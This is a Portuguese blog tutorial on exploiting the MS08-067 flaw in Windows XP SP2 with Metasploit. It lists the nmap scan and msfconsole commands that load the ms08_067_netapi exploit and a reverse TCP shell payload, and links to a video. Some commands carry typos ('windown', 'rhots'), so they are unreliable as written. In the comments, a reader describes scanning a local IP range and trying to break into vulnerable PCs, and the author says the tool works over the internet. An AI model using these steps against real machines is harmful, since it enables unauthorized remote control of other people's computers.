• homepost1

  • homepost4

  • homepost2

  • homepost5

  • homepost3

  • homepost6

  • homepost7

Metasploit - Explorando falha MS08-067

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:

Metasploit framework 3
Nmap

Exploit usado:
Citação:
ms08_067_netapi
Payload(carga) usado:
Citação:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citação:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assistir on-line: http://bhior.blip.tv/file/3534979

Filed Under: ,

About the Author

My name is Dinh Quang Huy or known as alias NhamNgaHanh .I made this template in magazine style and named it Simplex Darkness .I hope it helpful to persons who want a solutions for a template in Blogspot.To download this template and see template install instruction ,go to Simplex Design blog.

3 comments

Trackback URL | Comments RSS Feed

  1. tela says:

    bhior blz?
    cara optive sucessos tanto com PAYLOADS
    windows/shell/reverse_tcp como windows/vncinject/reverse_tcp

    Minha duvida é , dou o comando no terminal ( nmap -sP 192.168.1.1-255 ) tenho respota dos endereço dos IPs blz...
    agora faço assim ( nmap -v --script=smb-check-vulns 192.168.1.1-255 )

    tenho resposta das vulnerabilidade da porta 445 , 135,139 entre outras ou seja os ip que esteja com essa brexa eu posso entrar sem problemas?

    mas tipo tento entrar so que raramente consigo entrar e so entrei em um pc, esqueci tambem tem o comando nmap -O IP , tenhos resposta de alguns de outros não , sempre tento entrar nos que tem XP SP2,

     
  2. Bhior says:

    @Tela, Não, o metasploit pode ser usando na internet.

    Para que a auditoria seja concretizada, o micro alvo deve possuir vulnerabilidades... Não e porque essa estar aberta que você vai consegui uma penetração no sistema.

    As vulnerabilidades existem em todas as versões do Windows incluindo as mais recentes com Windows seven e windows vista.

    Procure mais sobre o nessus e o openvas.

    Abraços []'

     
  3. Anonymous says:

    Olá Bhior, utilizei essa tecnica e me retornou o seguinte erro. Login Failed. Execution Expired.

    Alguma falha de login? Teria como eu setar o login a ser usado? Pois a maquina na qual tentei conectar eu tenho todas as senhas de acesso.

    Valeu!

     

Leave a Reply